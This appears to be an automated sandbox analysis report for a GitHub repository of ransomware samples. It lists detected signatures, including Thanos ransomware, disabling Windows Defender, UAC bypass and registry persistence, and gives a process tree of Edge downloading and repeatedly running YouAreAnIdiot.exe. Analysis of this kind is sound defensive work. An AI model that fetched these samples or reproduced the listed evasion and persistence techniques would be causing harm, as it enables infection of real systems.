Resubmissions

14-10-2024 00:25

241014-aqws8axhrj 10

13-10-2024 23:25

241013-3ej99sxbkn 10

Analysis

  • max time kernel
    562s
  • max time network
    563s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-10-2024 00:25

Errors

Reason
Machine shutdown

General

  • Target

    https://github.com/kh4sh3i/Ransomware-Samples

Malware Config

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies WinLogon for persistence 2 TTPs 7 IoCs
  • Thanos Ransomware

    Ransomware-as-a-service (RaaS) sold through underground forums.

  • Thanos executable 1 IoCs
  • UAC bypass 3 TTPs 7 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 38 IoCs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Program crash 30 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 22 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 44 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 12 IoCs
  • NTFS ADS 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 6 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 44 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/kh4sh3i/Ransomware-Samples
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1356
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffedb0146f8,0x7ffedb014708,0x7ffedb014718
      2⤵
        PID:1960
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
        2⤵
          PID:1384
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1896
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:8
          2⤵
            PID:3004
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
            2⤵
              PID:2320
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
              2⤵
                PID:4100
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5720 /prefetch:8
                2⤵
                  PID:3536
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5720 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4528
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5036 /prefetch:8
                  2⤵
                    PID:1652
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1308 /prefetch:1
                    2⤵
                      PID:4628
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5252 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2940
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1908 /prefetch:1
                      2⤵
                        PID:2012
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1
                        2⤵
                          PID:4556
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6284 /prefetch:1
                          2⤵
                            PID:1768
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1
                            2⤵
                              PID:3600
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4244 /prefetch:1
                              2⤵
                                PID:1320
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6576 /prefetch:1
                                2⤵
                                  PID:4288
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:1
                                  2⤵
                                    PID:4428
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
                                    2⤵
                                      PID:4112
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6692 /prefetch:1
                                      2⤵
                                        PID:2052
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:1
                                        2⤵
                                          PID:1648
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6856 /prefetch:1
                                          2⤵
                                            PID:3196
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6680 /prefetch:1
                                            2⤵
                                              PID:2676
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6924 /prefetch:1
                                              2⤵
                                                PID:3692
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7156 /prefetch:1
                                                2⤵
                                                  PID:2536
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5740 /prefetch:2
                                                  2⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:1988
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6760 /prefetch:1
                                                  2⤵
                                                    PID:5564
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2676 /prefetch:8
                                                    2⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:5676
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6712 /prefetch:8
                                                    2⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:6064
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1
                                                    2⤵
                                                      PID:5704
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1
                                                      2⤵
                                                        PID:2284
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3100 /prefetch:1
                                                        2⤵
                                                          PID:3504
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7068 /prefetch:8
                                                          2⤵
                                                            PID:5356
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7084 /prefetch:8
                                                            2⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:5304
                                                          • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                            "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:5276
                                                          • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                            "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:3488
                                                          • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                            "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:1080
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1376
                                                              3⤵
                                                              • Program crash
                                                              PID:3944
                                                          • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                            "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:4552
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 1184
                                                              3⤵
                                                              • Program crash
                                                              PID:5156
                                                          • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                            "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:5772
                                                          • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                            "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:1028
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 1172
                                                              3⤵
                                                              • Program crash
                                                              PID:1588
                                                          • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                            "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:2212
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1172
                                                              3⤵
                                                              • Program crash
                                                              PID:4344
                                                          • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                            "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:5408
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 1172
                                                              3⤵
                                                              • Program crash
                                                              PID:1888
                                                          • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                            "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:4380
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 1172
                                                              3⤵
                                                              • Program crash
                                                              PID:4540
                                                          • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                            "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:5540
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 1172
                                                              3⤵
                                                              • Program crash
                                                              PID:3764
                                                          • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                            "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:2868
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 1176
                                                              3⤵
                                                              • Program crash
                                                              PID:5536
                                                          • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                            "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:5660
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5660 -s 1252
                                                              3⤵
                                                              • Program crash
                                                              PID:3568
                                                          • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                            "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:5760
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5760 -s 1104
                                                              3⤵
                                                              • Program crash
                                                              PID:2640
                                                          • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                            "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:3136
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 1100
                                                              3⤵
                                                              • Program crash
                                                              PID:1400
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6784 /prefetch:1
                                                            2⤵
                                                              PID:5264
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6780 /prefetch:8
                                                              2⤵
                                                                PID:4240
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2128,17699971793170292064,1861293155623359676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2692 /prefetch:8
                                                                2⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:208
                                                              • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                                "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:1224
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 1172
                                                                  3⤵
                                                                  • Program crash
                                                                  PID:3284
                                                              • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                                "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4284
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 1172
                                                                  3⤵
                                                                  • Program crash
                                                                  PID:5556
                                                              • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                                "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:6124
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 1252
                                                                  3⤵
                                                                  • Program crash
                                                                  PID:6088
                                                              • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                                "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:5000
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 1100
                                                                  3⤵
                                                                  • Program crash
                                                                  PID:3220
                                                              • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                                "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:2688
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2688 -s 1100
                                                                  3⤵
                                                                  • Program crash
                                                                  PID:4500
                                                              • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                                "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:2928
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 1104
                                                                  3⤵
                                                                  • Program crash
                                                                  PID:4940
                                                              • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                                "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:3360
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3360 -s 1104
                                                                  3⤵
                                                                  • Program crash
                                                                  PID:5680
                                                              • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                                "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:5004
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 1100
                                                                  3⤵
                                                                  • Program crash
                                                                  PID:1884
                                                              • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                                "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:628
